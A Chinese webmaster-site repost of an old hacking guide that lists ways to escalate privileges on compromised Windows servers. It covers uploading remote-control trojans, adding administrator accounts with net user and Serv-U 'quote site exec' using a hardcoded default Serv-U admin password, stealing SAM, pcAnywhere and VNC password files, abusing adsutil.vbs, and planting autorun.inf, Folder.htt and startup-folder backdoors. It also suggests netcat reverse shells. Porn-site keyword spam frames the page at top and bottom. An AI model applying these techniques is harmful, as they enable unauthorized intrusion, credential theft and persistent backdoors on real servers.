精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網

17站長網 首頁 安全 安全教程 查看內容

主流與非主流提權技術大全

2022-9-24 10:25| 查看: 1990 |來源: 互聯網

一:檢測一下網站的服務器是否開了 3389 遠程終端 二:檢測一下服務是否用了serv-u (還有是什么版本的) 方法 一:復制一個網站 用 3389 登陸器連 ...

一:檢測一下網站的服務器是否開了 3389 遠程終端  
二:檢測一下服務是否用了serv-u (還有是什么版本的)
方法 一:復制一個網站 用 3389 登陸器連接一下 (是否成功)能連接了,拿下服務器的機率,提高 30%了
二:用ftp模式查下一個服務器的版本  
開始 -- 運行 -- cmd -- ftp (加你要登陸的網站)  
--------------------------------------------------------------------------------  
第一步:最簡單的方法
看有沒有權限,能不能執行命令,行的話直接傳個鴿子(隨便什么遠程控制木馬都行,成功率極低.  
--------------------------------------------------------------------------------  
第二步::尋找有執行的權限目錄
c:\\\\winnt\\\\system32\\\\inetsrv\\\\data\\\\    
c:\\\\Documents And Settings\\\\All Users\\\\
c:\\\\Program Files\\\\serv-u\\\\  
C:\\\\Program Files\\\\Microsoft SQL Server\\\\  
這樣的目錄可以直接上傳鴿子,運行
-----------------------------------------------------------------------------------  
第三步:傳個cmd和開帳號的ftp.exe上去直接加帳號,命令就是你上傳目錄D:\\\\VMware Workstation\\\\cmd.exe \\"net user love love /add\\"  
-----------------------------------------------------------------------------------    
第四步:asp提權木馬直接提權
serv-u 6.3 版本 好象用asp提權木馬(不成功)
serv-u 6.2 版本 好象可以  
不過提權能不能用asp木馬還要看服務器,設置的變態不,假設直接用asp提權成功之后,還是不成功,但是可以在 cmd之下 用這個帳號連接一下ftp (加你提權的網站)  
帳號:LocalAdministrator 密碼:$ak#.1k;0@p\\"〉#1@$ak#.1k;0@p
如果成功連接后就可以直接添加管理員帳號了
命令:quote site exec (你添加的帳號) net user 123 123 /ad
quote site exec (把帳號提升到最高權限) net localgroup administartors 123 /add  
---------------------------------------------------------------------------------------  
第五步:pcaanywhere
C:\\\\Documents And Settings\\\\All Users\\\\Application Data\\\\Symantec\\\\pcAnywhere\\\\  
這里下他的GIF文件,在本地安裝pcanywhere上去
---------------------------------------------------------------------------------------  
第六步:serv-u覆蓋提權
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini  
網上很多教程
----------------------------------------------------------------------------------------  
第七步:Serv-U轉發端口
給Latte加鹽 曾經做個一個(serv-u經典提權全套教程)用到過這個方法,可以學習一下
上傳個端口轉發工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個Serv-u,新建一個服務器,IP填對方IP,帳號為LocalAdministrator 密碼為$ak#.1k;0@p\\"〉#1@$ak#.1k;0@p  
連接上后你就可以管理他的Serv-u了
-----------------------------------------------------------------------------------------  
第八步:社會工程學之提升提權
把灰鴿子傳到上面,然后轉移到c盤,就等著管理員運行了,前提你的鴿子必須免殺讓我看到一個不清楚的exe程序,老想點開看看,呵呵(方法比較笨)
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密碼,登陸
C:\WINNT\system32\config進這里下它的SAM,破解用戶的密碼
c:\winnt\repaire 下是備份用到破解sam密碼的軟件有LC,SAMinside
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這里能不能跳轉,我們從這里可以獲取好多有用的信息比如Serv-U的路徑,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM,破解密碼
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多時候沒作限制,把提升權限的工具上傳上去,然后執行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\  
C:\Documents and Settings\All Users\  
c:\winnt\system32\inetsrv\data\  
c:\Program Files\  
c:\Program Files\serv-u\  
C:\Program Files\Microsoft SQL Server\  
c:\Temp\  
c:\mysql\(如果服務器支持PHP)  
c:\PHP(如果服務器支持PHP)
運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限
還可以用這段代碼試提升,好象不是很理想的,如果主機設置很變態,可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs等木馬。
根目錄下隱藏autorun.inf
C:\PROGRAM FILES\KV2004\ 綁
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下
replace 替換法 捆綁腳本 編寫一個啟動/關機腳本 重起
刪SAM :( 錯
CAcls命令  
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的權限提升21大法! 以下全部是本人提權時候的總結 很多方法至今沒有機會試驗也沒有成功,但是我是的確看見別人成功過的。本人不才,除了第一種方法自己研究的,其他的都是別人的經驗總結。希望對朋友有幫助! 1.radmin連接法
條件是你權限夠大,對方連防火墻也沒有。封裝個radmin上去,運行,開對方端口,然后radmin上去。本人從來米成功過。,端口到是給對方打開了。 2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF文件,在本地安裝pcanywhere上去 3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之 4.SU密碼奪取
C:\Documents and Settings\All Users\「開始」菜單\程序\  
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉進去后,如果有權限修改ServUDaemon.ini,加個用戶上去,密碼為空  
[USER=WekweN|1]  
Password=  
HomeDir=c:\  
TimeOut=600  
Maintenance=System  
Access1=C:\|RWAMELCDP  
Access1=d:\|RWAMELCDP  
Access1=f:\|RWAMELCDP  
SKEYvalues=  
這個用戶具有最高權限,然后我們就可以ftp上去 quote site exec xxx 來提升權限 5.c:\winnt\system32\inetsrv\data\  
引用:就是這個目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權限的工具上傳上去,然后執行 6.SU溢出提權
這個網上教程N多 不詳細講解了 7.運行Csript
引用:運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權限  
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps  
查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll  
再將asp.dll加入特權一族  
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)  
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"  
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"  
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"  
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了 8.腳本提權
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動"寫入bat,vbs 9.VNC
這個是小花的文章 HOHO  
默認情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password
我們可以用vncx4破解它,vncx4使用很簡單,只要在命令行下輸入c:\>vncx4 -W 然后順序輸入上面的每一個十六進制數據,沒輸完一個回車一次就行了。 10.NC提權
給對方來個NC 但是條件是你要有足夠的運行權限 然后把它反彈到自己的電腦上 HOHO OK了 11.社會工程學之GUEST提權
很簡單 查看他的擁護 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵箱號 手機號 盡量看看 HOHO 12.IPC空連接
如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令 13.替換服務
這個不用說了吧?個人感覺相當復雜 14.autorun .inf
autorun=xxx.exe 這個=后面自己寫 HOHO 加上只讀、系統、隱藏屬性 傳到哪個盤都可以的 不相信他不運行 15.desktop.ini與Folder.htt
引用:首先,我們現在本地建立一個文件夾,名字不重要,進入它,在空白處點右鍵,選擇"自定義文件夾"(xp好像是不行的)一直下點,默認即可。完成后,你就會看到在此目錄下多了兩個名為Folder setting的文件架與desktop.ini的文件,(如果你看不到,先取消"隱藏受保護的操作系統文件")然后我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼:然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方任意一個目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執行了我們的后門 16.su覆蓋提權
本地安裝個su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重起一下Serv-U,于是你上面的所有配置都與他的一模一樣了

tag標簽:提權技術
本文最后更新于 2022-9-24 10:25,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 一级黄色毛片子 | aa一级片| 欧美唯爱网 全黄性播放 | 91久久精品国产亚洲 | 久久一区二区精品 | 国产精品七七在线播放 | 黄色大片在线 | 亚洲国产日韩女人aaaaaa毛片在线 | 免费看影片的网站入口 | 九九九热在线精品免费全部 | 日日噜噜夜夜狠狠久久丁香七 | 一级黄色免费网站 | 天天爽夜夜爽人人爽 | 欧美成人一区二区 | 樱花草在线社区www韩国 | 亚洲xxx视频 | 国产精品呦呦 | 日韩一区二区三区视频在线观看 | 欧美一级特黄aa大片婷婷 | 中文字幕在线观看网站 | a资源在线观看 | 9191亚洲高清国产 | 一区精品麻豆入口 | 日本高清xxx免费视频 | 精品国产一区二区三区在线观看 | 色www永久免费视频 色xxx | 久久性视频 | 亚洲国产精品久久精品怡红院 | 日韩一级片视频 | 日操夜操天天操 | 一级做a爱视频 | 亚洲图片二区 | 天天色综合久久 | 欧美日韩中文字幕在线视频 | 一区二区三区在线播放 | 99精品视频在线观看re | a一区二区三区视频 | 免费高清在线影片一区 | 久久久久久久国产视频 | 亚洲经典激情春色另类 | 亚洲成在人网站天堂一区二区 |